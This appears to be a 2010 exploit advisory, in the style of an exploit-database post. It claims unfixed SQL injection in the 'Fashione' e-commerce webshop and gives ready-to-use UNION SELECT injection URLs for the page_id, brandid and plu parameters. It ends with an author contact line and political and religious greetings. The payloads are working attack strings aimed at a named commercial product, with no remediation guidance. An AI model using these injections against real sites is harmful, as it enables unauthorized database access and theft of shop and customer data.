________ _____________ / /_ / ___/ _ \/ ___/ ___/ _ \/ __/ (__ ) __/ /__/ / / __/ /_ /____/\___/\___/_/ \___/\__/ ##################################################################### # Exploit Title: Fashione E-Commerce Webshop Multiple SQL Injection Vulnerabilities # Date: 2010-09-19 # Author: secret # Contact : mohammed.atta@hotmail.com / ICQ : 17-33-77 # Site : swissfaking.net/board # Software Link: http://www.fashione.co.uk/ # Version: All versions so far # Tested on: XP # Fixed? : NOT FIXED ---------------------------------------------------------------------------- [Multiple SQL Injection Vulnerabilities] "brandid=" / "plu=" / "page_id=" e.g. http://server/index.php?page_id=-1+and+1=0+Union+Select+[VISIBLE],2,3,4 e.g. http://server/index.php?page_id=prod&brandid=248&brand_name=LUKE 1977&plu=0001246502+and+1=0+Union+Select+[VISIBLE],2,3,4 e.g. http://server/index.php?page_id=prod&brandid=248+and+1=0+Union+Select+[VISIBLE],2,3,4 ################################################################################################ [THANKS TO] ALLAH - الله لا إله لا ايل To all my brothers & sisters in IRAN - god bless you - support the GREEN REVOLUTION